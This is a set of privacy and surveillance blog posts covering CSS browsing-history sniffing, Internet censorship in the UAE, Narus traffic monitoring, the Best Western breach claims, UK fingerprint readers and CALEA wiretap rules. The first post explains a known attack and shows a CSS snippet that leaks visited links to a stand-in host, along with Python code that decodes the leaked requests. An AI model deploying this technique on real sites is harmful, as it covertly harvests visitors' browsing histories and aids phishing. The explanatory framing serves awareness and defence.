
There Is No Privacy #1: Snooping Browsing History through HTML

Unless you have installed a couple of specific Firefox extensions to protect yourself, the owner of any website you visit can test whether you have visited any other given website.

It has been known since 2006 that it is possible for any website to query whether you have visited any of a list of other websites, without even having to use JavaScript. One way to do this relies on the fact that CSS (the style sheet language used by virtually every website) allows a site to specify a different color or background image for a given link depending on whether that link has been visited before. By specifying a URL on the snooping host as the background of a visited link, a snooping website can determine whether you have visited that link, as a snippet along these lines demonstrates:

    <style type="text/css">
        /* Placeholder URLs. The background image is requested only when
           the link is :visited, so the request itself leaks history. */
        #foo:visited {
            background: url('http://snooper.example/track?link=bank');
        }
    </style>

    <a id="foo" href="http://bank.example/"></a>
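
On the server side, the snooping host only needs to watch which background-image URLs get requested. A minimal sketch in Python (the `/track?link=...` URL scheme is invented for illustration; any URL the snooper controls works the same way):

```python
from urllib.parse import urlparse, parse_qs

def visited_link_from_request(path):
    """Recover which link a visitor's browser styled as :visited from the
    background-image request it triggered. The /track?link=... scheme is
    hypothetical; the point is that the request only arrives at all when
    the link is in the visitor's history."""
    parts = urlparse(path)
    if parts.path != "/track":
        return None  # unrelated request (page load, favicon, etc.)
    return parse_qs(parts.query).get("link", [None])[0]

# A hit on /track?link=bank reveals that the visitor's browser applied
# the :visited style, i.e. that URL is in their browsing history.
print(visited_link_from_request("/track?link=bank.example"))  # prints bank.example
```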

To watch this attack in action, click on the ‘View all sites of interest’ link on the right-hand side of this page by Markus Jakobsson, Tom N. Jagatic, and Sid Stamm at Indiana University. The authors specifically suggest that this sort of attack could be used by phishers to figure out which bank to emulate to fool a user into logging into a fake bank page, but there are any number of other ways to use this information. Felten and Schneider have written about a related attack that uses cache timing to gain the same sort of access to a user’s browsing history.

Neither the link-background attack nor the cache-timing attack relies on JavaScript, the source of a large number of privacy attacks. This freedom from JavaScript makes the attacks particularly effective, since one common (though highly inconvenient) way of securing a browser is to turn off JavaScript support; even those who do so are not safe from these attacks. There are Firefox extensions to protect against both attacks, but they are not widely used. The developers of the core Firefox browser have chosen not to include the code from those extensions in the base browser, even though the attack has been well known among security geeks for a couple of years, with the result that the vast majority of users remain vulnerable. The end result is that, unless you use Firefox and install the above extensions or periodically purge your browser history, any website you visit can tell whether you have visited any other website.

Update: The above extensions evidently don’t even work with Firefox 3.0, though Firefox 3.1 is reported to have a configuration setting (not accessible through the UI) that blocks the attack by turning off the visited-link feature altogether.


Schneier (wrong) on censorship

Security guru (and potential CISO for the Obama Administration) Bruce Schneier recently blogged about his thoughts on the Internet censorship methods used in the United Arab Emirates:

The government of the United Arab Emirates (UAE) pervasively filters Web sites that contain pornography or relate to alcohol and drug use, gay and lesbian issues, or online dating or gambling. Web-based applications and religious and political sites are also filtered, though less extensively. Additionally, legal controls limit free expression and behavior, restricting political discourse and dissent online.

What was interesting to me was how reasonable the execution of the policy was. Unlike some countries — China, for example — that simply block objectionable content, the UAE displays a screen indicating that the URL has been blocked and offers information about its appeals process.

Have things gotten so bad that transparent censorship is something to be praised?

At the end of the day, is being forwarded to a page hosted by the Ministry of Information that much better than being silently redirected to an inoffensive website, a tactic the Chinese adopted in their recent blocking of BitTorrent websites?

From the perspective of the end user, the information they want is still beyond reach — and who in her right mind is going to risk drawing attention to herself by filing an appeal to request a manual review of the blocking of information on Falun Gong, homosexuality, or another banned topic?

Internet censorship should not be praised — and to see Schneier, a top executive at a major international telecommunications company, saying anything positive about the subject is alarming.

Schneier might be correct on most things security, but on this issue, he’s frighteningly wrong.

Narus: Security through Surveillance

In 2006, an AT&T engineer named Mark Klein revealed a secret room inside a major Internet hub that was accessible only to engineers with NSA security clearance. His revelation was written up in the New York Times as part of its larger coverage of NSA wiretapping of domestic communications. Among the documents Klein revealed was an equipment list for the secret room; alongside a dozen high-powered servers and networking devices on that list was a single device from a company called Narus.

Narus describes itself as “the leader in real-time traffic intelligence for the protection and management of large IP networks.” In practice, Narus produces network monitoring software for two purposes: protection and management of the traffic itself and “semantic analysis” of the traffic. The first product sits in the middle of large network carriers (like AT&T) and provides analysis of traffic to detect cyber-security threats like worms, denial of service attacks, and network hijackings. Here’s a diagram from a Narus demo showing its network management product:

The second “semantic analysis” product is marketed to governments for use in law enforcement:

* Intercept and surveillance application for real-time precision targeting of any type of IP traffic
* Provides real-time, surgically precise targeting, allowing full IP session reconstruction and visibility for targeted traffic such as webmail, e-mail, IM, chat, VoIP and other IP-based communications
* Enables the capture of packet-level, flow-level and application-level usage information for forensic analysis, surveillance and regulatory compliance
* Secures network monitoring with the complete capture of only targeted data
* Insight into, and monitoring of, the entire network regardless of size, speed or the routing topology of the network

In other words, Narus sells the “mass intercept” black boxes that sit in phone company closets surveilling customer traffic for the NSA and other intelligence / law enforcement agencies. The Narus box listed in the document revealed by Klein was one of the Narus products designed for this use.

Both of the Narus products are built on the same underlying platform, because surveilling a network to manage it and surveilling a network to process user traffic are largely the same task. Indeed, as Narus itself promotes, the two blend into one another.

The same product that can block worms and DDoS attacks can also block “rogue VoIP” connections in Pakistan, “mediate” dangerous websites in Saudi Arabia, and “tier” service for preferred content providers. And a slightly differently focused version of that same product can collect, sort, and archive user content, including web, email, chat, and even webmail for targeted or mass surveillance. Once a box with these sorts of specific surveillance capabilities is sitting in the middle of the network, it potentially has access to all of the data flowing over that network. It’s a natural marriage for the company that makes the boxes to extend into both the network management and the government surveillance markets, and into the spaces between.
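
The shared-platform point can be made concrete with a toy sketch (the port table and policy rules below are invented for illustration, not Narus’ actual logic): a single flow-classification core feeds both a management policy and an intercept policy.

```python
# Toy sketch (invented ports and rules): one classification core,
# two consumers -- network management and targeted surveillance.
APP_PORTS = {25: "email", 80: "web", 5060: "voip", 6881: "bittorrent"}

def classify_flow(src_ip, dst_ip, dst_port):
    """Label a flow by application, the way DPI gear tags traffic."""
    return {"src": src_ip, "dst": dst_ip,
            "app": APP_PORTS.get(dst_port, "other")}

def manage(flow):
    """Management use: block or shape flows by application type."""
    return "block" if flow["app"] == "bittorrent" else "allow"

def intercept(flow, targets):
    """Surveillance use: flag the same flows for capture when either
    endpoint appears on a target list."""
    return flow["src"] in targets or flow["dst"] in targets
```

The only difference between the two uses is what the caller does with the matched flows: drop them, or archive them.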

The common theme running through these uses is security through surveillance. Narus’ network management features provide security from botnets, worms, and other such cyber threats by surveilling massive amounts of traffic for “actionable intelligence” about the state of the network. Narus’ mass intercept features provide security from terrorists and dissidents by surveilling massive amounts of traffic for “actionable intelligence” about the communications of users within the network. Many scholars argue that judging surveillance as a tradeoff between security and liberty makes no sense: massive use of CCTV cameras in the U.K. has not been shown to decrease crime, and NSA surveillance of domestic phone calls in the U.S. has led to lots of investigations of pizza places. But the utility of Narus and other such systems seems both straightforward and necessary in the age of 40 Gbps DDoS attacks.

The danger of this confluence of functions is that Narus boxes are given complete access to “over 30% of the world’s Internet traffic” while “meeting the most stringent requirements of the world’s largest networks such as at&t, KT, KDDI, Telecom Egypt, KPN and US Cellular.” The use of the boxes not only places enormous trust in the systems Narus is building but also makes their more intrusive uses simply a matter of flipping a switch.


Best Western Data Breach as Shell Game

On August 26, 2008, the Sunday Herald reported that a hacker had broken into the Best Western reservations system and stolen personal and financial data, including credit card numbers, for eight million Best Western customers. According to the report, the thief had installed a virus on the machine of an employee of a local hotel and used it to log the employee’s username and password for the hotel system. With that login information, the thief had simply and quickly mined the reservation system for information about all of Best Western’s customers. The original report quoted a security expert as exclaiming that “there’s enough data there to spark a major European crime wave.” Accustomed to a string of announcements about large-scale data breaches, news media and blogs across the Internet amplified the report.

Almost immediately, the CIO of Best Western posted a comment on the Sunday Herald story’s web page asserting that “This story is grossly unsubstantiated! … This has affected only ten customers who we are currently being contacted to offer our assistance, none of these were GB customers.” Within a couple of days, Information Week posted an interview with the CIO, in which he argued that individual hotel clerks have access only to accounts for their local hotels, that credit card information is deleted from the system within seven days of use, and that the reporter of the original story had basically made up the eight million number out of whole cloth. Neither the Sunday Herald nor the original reporter has amended the story or commented on the claims that they exaggerated the problem. The reporter claimed to have screenshots showing the entire database of eight million accounts but has not posted those screenshots or any further evidence of a large-scale data breach.

Notwithstanding the well-established habit of companies attempting to minimize the importance of their data breaches, the bulk of the evidence suggests that the Best Western side of the story is much more likely to be closest to the truth. Hacker or no hacker, it would be egregious to allow a single clerk at a local hotel access to the credit card details of every single Best Western customer. Likewise, it would be horrible security practice not to monitor access to sensitive customer information by authorized users (as the CIO claims his systems were doing). With thousands of such local clerks, it would be inevitable that some would succumb to the temptation to steal account information, without need for any sophisticated software. This is not to say that such a data breach is impossible or that more egregious data breaches have not happened. But without more evidence, it seems very likely that the original reporter got carried away and assumed a much greater breach than actually happened.

What’s interesting about the case is the difficulty of telling exactly what happened, and what that difficulty says about the state of security and privacy online. Despite claims of a massive crime wave, the system of social insurance set up around credit cards is able to handle large-scale breaches of account information without widely visible effects on customers. For example, the 2007 T. J. Maxx data breach exposed more than 45 million credit card numbers. The FBI reported millions of dollars in theft from Walmart, but that level of theft is line noise within Walmart’s total credit card sales, let alone within all credit card transactions.

The card companies are able to detect fraudulent card use in many or most cases and either refuse the charges or charge them back to the merchants (resulting in higher prices from the merchants). Thieves are more likely to charge small amounts to large numbers of cards than large amounts to individual cards, to avoid notice, further mitigating the damage done. Fraudulent charges that are noticed by customers are eaten by the card companies (and passed on in large part to customers as credit card fees), and those that go unnoticed are simply eaten by the customers. But again, the charges most likely to go unnoticed are small ones. The card companies don’t want customers to feel that their cards are insecure, so they do not advertise this arrangement, but the industry is structured simply to eat some small percentage of fraudulent charges as the price of using credit cards widely.

Because of large scale data breaches and the general insecurity of our current computing / Internet infrastructure, credit card numbers at this point are basically an advisory security feature. They are just secret enough to let other folks know that it is wrong to use them, but not secret enough to stop a bad guy from getting access to them. The credit card companies have a strong vested interest, however, in the idea that credit cards are strongly secure, because customers will stop using them if they feel they can’t be trusted. So they encourage the idea that credit cards are secure, while implementing strong mechanisms on the back end (such as increasingly aggressive fraud detection algorithms) to deal with the fact that they are not.
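
A toy version of that back-end screening (all thresholds invented for illustration): since the number itself proves nothing, the real checks are behavioral.

```python
def is_suspicious(charge, history):
    """Toy fraud screen with invented thresholds: flag a charge that is
    far larger than the card's historical average or comes from a new
    country. Real card-network models are far more elaborate, but the
    shape is the same -- score behavior, not the secrecy of the number."""
    avg = sum(c["amount"] for c in history) / len(history)
    new_country = charge["country"] != history[-1]["country"]
    unusual_size = charge["amount"] > 5 * avg
    return new_country or unusual_size
```

Under rules like these, a thief making many small charges in the cardholder’s home country sails under the threshold, which is exactly why small-charge fraud is the pattern that gets absorbed as a cost of doing business.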

Massive breaches of credit card data like the T. J. Maxx case and the alleged Best Western case highlight the nature of this shell game, though. The system can absorb the loss of tens of millions of card numbers with little or no impact on end customers en masse. But because the credit card companies have this interest in hiding what’s actually happening, it’s very difficult to decode these cases. They fade into the background one way or another — either because there was no data breach or because the system of social insurance created by the card companies absorbs the costs with little real impact on end customers. The only thing we can tell from these cases is the shell-game nature of credit card numbers (and of online privacy in general, but that’s an argument for further posts!).


Handheld fingerprint readers and the British surveillance state

Hundreds of years ago, with the passage of the Magna Carta, Great Britain took a bold step in outlining basic civil liberties for the common man. Unfortunately, over the past few years, the UK has switched from being a basic-rights trendsetter to a surveillance innovator. Whatever happened?

Last year, a troubling new law came into effect that makes it a criminal offense to refuse to hand over one’s encryption key to law enforcement engaged in a ‘legitimate’ investigation. This was tested in court a couple of weeks ago, and unfortunately, the right to privacy lost. As Ars Technica described:

The Court stated that although there was a right to not self-incriminate, this was not absolute, and that the “public interest” can supersede this right in some circumstances.

Just last week, the British government floated a proposal to require that a passport be shown in order to purchase a mobile phone or SIM card. After all, what’s the point in spending all that money recording calls and real-time location information if you can’t be sure who is speaking on the other end of the line?

Finally, the latest nail in the privacy coffin has been announced: Starting in 2009, British police will be issued hand-held fingerprint readers, connected to a central server via a wireless/cellular connection. Given the existing (and troubling) powers that police have to arbitrarily stop and question people in the street due to “terrorism” concerns, this’ll allow them to immediately determine someone’s identity on the spot, with or without a national ID card.

Thankfully, it isn’t yet a crime to not have working fingerprints. Thus, it’s quite easy to imagine the privacy-aware crowd turning to acid, glue or other techniques to erase the ridges and swirls from their own fingertips.


CALEA Status

I recently spent a surprisingly difficult afternoon trying to figure out the current status of CALEA (the Communications Assistance for Law Enforcement Act), the 1994 law that requires telecommunications companies to build tools into their telephone networks that allow them to respond quickly and fully to law enforcement requests for wiretaps. CALEA is a hugely important surveillance law that few people outside of the surveillance / networking field know about at all. And even for those of us who spend our days studying surveillance, it’s difficult just to figure out what it means — not in the larger sense, just what it actually requires in plain language. Relying largely on this excellent post by Susan Crawford, here’s my understanding:

The impetus for CALEA in 1994 was the growing use of a new generation of digital telephone switches that did not inherently provide the same support for wiretapping as did the older tools. In 2005, the FCC extended its interpretation of the law to require that ISPs provide wiretapping access to a range of Internet data. The accessible data includes voice over IP (VoIP) Internet telephony services like Vonage and Skype, data about when and for how long Internet broadband subscribers connect to the Internet, and packet header data (the source and destination addresses and the port number) of all VoIP packets. In order to reduce the very large cost of implementing this new interpretation of CALEA, the FCC has ruled that ISPs could forward their entire data stream to an independent “Trusted Third Party” to handle the wiretapping implementation, with the effect of exposing the entire data stream of an ISP using this option to a third party.
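
“Packet header data” is a fixed slice of bytes at the front of each packet. A sketch of the extraction (assuming IPv4 with TCP or UDP on top; real intercept hardware does this at line rate):

```python
import socket
import struct

def parse_headers(packet):
    """Pull out the fields the 2005 ruling covers for VoIP packets:
    source/destination IP addresses and port numbers. Sketch only;
    assumes an IPv4 packet carrying TCP or UDP."""
    ihl = (packet[0] & 0x0F) * 4                 # IP header length in bytes
    src_ip = socket.inet_ntoa(packet[12:16])     # bytes 12-15: source address
    dst_ip = socket.inet_ntoa(packet[16:20])     # bytes 16-19: destination
    # For TCP and UDP alike, the first four bytes after the IP header
    # are the source and destination ports.
    src_port, dst_port = struct.unpack("!HH", packet[ihl:ihl + 4])
    return src_ip, dst_ip, src_port, dst_port
```

Note how little of the packet this touches: the mandate covers who talked to whom and over which service, not (under this provision) the payload itself.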

The Department of Justice submitted a petition in 2007, yet to be ruled on, to include the packet header data of all Internet traffic, not just VoIP: web, email, instant messaging, and everything else. CALEA does not provide legal justification for anyone to actually access the provided data; it only mandates that the ISP build the technical capability to respond to such requests, whose legality is determined by other laws. And the laws that regulate wiretapping require law enforcement agencies to wiretap only specific individuals and only with a warrant.

Between 2005, when the new requirements for ISPs were enacted, and the 2007 deadline for compliance, there was a great deal of controversy over whether CALEA would cover universities (and libraries, schools, and other such organizations) that function as ISPs for their communities. This Ars Technica article, this EduCause policy letter, and my own private conversations indicate that universities chose not to comply with the CALEA requirements for ISPs, and that the FCC chose not to require compliance, though there is still a great deal of ambiguity about what CALEA means for universities.

There is no oversight of the Trusted Third Parties that are now widely used by ISPs to comply with CALEA. For an ISP that uses a Trusted Third Party, every bit of data of every one of its customers flows through that external company. This arrangement invests a huge amount of trust in companies that customers don’t even know about, let alone have any reason to trust.

The legally mandated 2007 annual wiretap report counted 2,208 authorized wiretaps in the country, resulting in about 5,000 arrests; from those 5,000 arrests, about 1,000 convictions were obtained. The 2005 ruling that required ISPs to comply with the law also required that the ISPs pay for the necessary changes themselves. Because the costs are borne by the individual ISPs, there are no concrete numbers for the total cost of compliance. Estimates have ranged from 1 to 5 cents per subscriber per month ($7 million – $35 million per year) to $7 billion for university compliance. Significant extra costs fall on the client side for law enforcement agencies to receive the data, including up to $30,000 per year for equipment to receive the data and up to $20,000 per month for the T-1 lines required by some providers to deliver it.
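
A quick sanity check on the per-subscriber estimate (assuming both ends of the $7M–$35M range describe the same subscriber base): the two endpoints are consistent, and both imply a base of roughly 58 million subscribers.

```python
# Sanity check: at 1 cent per subscriber per month, $7M/year implies a
# subscriber base of about 58 million; the same base at 5 cents per
# month reproduces the $35M high end.
low_annual = 7_000_000
subscribers = low_annual / (0.01 * 12)   # subscribers implied by the low end
high_annual = subscribers * 0.05 * 12    # high end implied by that base
print(round(subscribers / 1e6, 1), round(high_annual))
```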
